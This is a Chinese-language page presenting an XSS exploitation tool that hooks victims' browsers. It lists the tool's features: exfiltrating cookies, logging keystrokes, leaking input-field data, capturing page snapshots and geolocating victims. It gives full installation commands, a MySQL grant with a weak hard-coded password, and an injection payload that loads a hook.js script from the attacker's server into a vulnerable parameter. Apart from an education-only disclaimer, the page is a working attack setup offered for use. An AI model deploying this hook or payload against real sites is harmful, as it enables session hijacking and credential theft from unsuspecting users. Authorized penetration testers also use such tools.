XSS Exploitation Tool | XSS 漏洞利用工具插图

XSS Exploitation Tool是一款专注于跨站脚本漏洞利用的渗透测试工具。该工具提取了受害者浏览器的技术数据、受害者的地理位置以及上钩/访问页面的快照和源代码,同时泄露输入字段数据、渗出饼干并记录键盘操作。此工具仅用于教育目的,请勿在真实环境中使用。

特征

  • 受害者浏览器的技术数据
  • 受害者的地理位置
  • 上钩/访问页面的快照
  • 上钩/访问页面的源代码
  • 泄露输入字段数据
  • 渗出饼干
  • 键盘记录
  • 显示警告框
  • 重定向用户
XSS Exploitation Tool | XSS 漏洞利用工具插图1

安装

在Debian 11上测试,您需要Apache、Mysql数据库和带有模块的PHP:

$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html

安装Git并拉取XSS-Exploitation-Tool源代码:

$ sudo apt-get install git
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

安装Composer,然后安装应用程序依赖项:

$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/

初始化数据库:

bashCopy Code$ sudo mysql

创建具有特定权限的新用户:

MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> quit
Bye

创建数据库(将产生一个空白页):

访问页面http://server-ip/reset_database.php

适配javascript钩子文件,文件hook.js是一个钩子。需要将第一行的ip地址替换为XSS漏洞利用工具的服务器ip地址:

var address = "your server ip";

如何运行

首先,创建一个页面(或利用跨站脚本漏洞)插入Javascript钩子文件(参见根目录下的exploit.html):

vulnerable_param=<script src="http://your_server_ip/hook.js"/>

然后,当受害者访问被钩住的页面时,XSS Exploitation Tool服务器应该列出被钩住的浏览器。

XSS Exploitation Tool | XSS 漏洞利用工具插图2

截图

XSS Exploitation Tool | XSS 漏洞利用工具
XSS Exploitation Tool | XSS 漏洞利用工具

相关工具下载

XSS Exploitation Tool
此工具仅用于教育目的,请勿在真实环境中使用